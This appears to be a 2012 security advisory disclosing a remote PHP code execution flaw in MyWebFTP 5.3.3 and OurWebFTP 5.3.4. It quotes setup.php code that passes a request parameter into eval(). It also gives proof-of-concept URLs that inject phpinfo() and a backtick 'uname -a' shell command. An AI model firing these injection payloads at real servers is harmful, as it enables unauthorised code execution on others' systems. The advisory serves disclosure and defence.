MyWebFTP 5.3.3 & OurWebFTP 5.3.4 Remote PHP Code Execution Vulnerability

2012.07.24

Credit: condis

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-94

MyWebFTP 5.3.3 & OurWebFTP 5.3.4 Remote PHP Code Execution Vulnerability
by condis
04.10.2011

download: http://www.mywebftp.com/download.php
          http://www.ourwebftp.com/download.php

Source of setup.php:

	30. 	start_html();
	31. 	if( checkReady() ){					[1]
	32. 		init();
	33. 		listSetupOptions();
	34. 		if ( isset($_REQUEST['step']) ){
	35. 			$step = $_REQUEST['step'];			
	36. 			eval("step_$step();");			[!]
	37. 		}
	

To exploit this issue, everything must be configured propely so that installation 
can be done without any errors [1]. To meet these conditions all you have to do
is make sure that there is directory with name defined in LD_DIR const with 
permission to write into it, and that the administrator haven't deleted setup.php


Proof of Concept:
	
	http://host.tld/myftpdir/setup.php?step=;phpinfo();//
	http://host.tld/myftpdir/setup.php?step=;print_r(`uname -a`);//

References:

http://www.mywebftp.com/download.php

http://www.ourwebftp.com/download.php

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

MyWebFTP 5.3.3 & OurWebFTP 5.3.4 Remote PHP Code Execution Vulnerability

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.